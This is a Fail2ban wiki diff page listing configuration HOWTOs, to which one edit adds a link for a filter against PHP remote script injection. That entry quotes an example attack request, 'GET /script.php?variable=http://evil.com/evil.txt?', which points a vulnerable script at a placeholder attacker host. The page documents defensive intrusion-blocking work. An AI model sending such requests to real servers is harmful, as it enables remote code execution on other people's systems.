Difference between revisions of "HOWTOs"
From Fail2ban
Jump to navigationJump to search (added link to filter config for php injectiona ttacks) |
|||
| Line 14: | Line 14: | ||
* [[HOWTO fail2ban with ModSecurity2.5|HOWTO fail2ban with Mod_Security 2.5]] - configure fail2ban to use Mod_Security 2.5 logs | * [[HOWTO fail2ban with ModSecurity2.5|HOWTO fail2ban with Mod_Security 2.5]] - configure fail2ban to use Mod_Security 2.5 logs | ||
* [http://blogs.buanzo.com.ar/2009/01/fail2ban-rules-for-lighttpd-fastcgi-alerts.html HOWTO fail2ban and lighttpd] - FastCGI's ALERT filter.d config | * [http://blogs.buanzo.com.ar/2009/01/fail2ban-rules-for-lighttpd-fastcgi-alerts.html HOWTO fail2ban and lighttpd] - FastCGI's ALERT filter.d config | ||
| + | * [http://blogs.buanzo.com.ar/2009/04/fail2ban-filter-for-php-injection-attacks.html HOWTO fail2ban and PHP remote script injection via GET/POST variables using allow_url_fopen and such] - Fail2ban filter to match "GET /script.php?variable=http://evil.com/evil.txt?" attacks. | ||
== Installation == | == Installation == | ||
Revision as of 13:38, 1 April 2009
Configuration
- German Howto
- How To Español
- Ipcop How To
- System: fail2ban and iptables from The Art of Web
- Using fail2ban to Block Brute Force Attacks by Marius Ducea
- Fail2ban: an enemy of script-kiddies by Yaroslav Halchenko
- HOWTO fail2ban explains how to install and use Fail2ban on Gentoo.
- HOWTO fail2ban with qpopper - configure qpopper pop3 services with fail2ban
- fail2ban with SquirrelMail - instructions and links
- fail2ban with OpenSuse 10.3 - step by step instructions on using fail2ban with OpenSuse with courier email services, etc.
- HOWTO fail2ban and sendmail - sendmail on a Debian system
- HOWTO - Geographically localize the banned IPs
- HOWTO fail2ban with Mod_Security 2.5 - configure fail2ban to use Mod_Security 2.5 logs
- HOWTO fail2ban and lighttpd - FastCGI's ALERT filter.d config
- HOWTO fail2ban and PHP remote script injection via GET/POST variables using allow_url_fopen and such - Fail2ban filter to match "GET /script.php?variable=http://evil.com/evil.txt?" attacks.
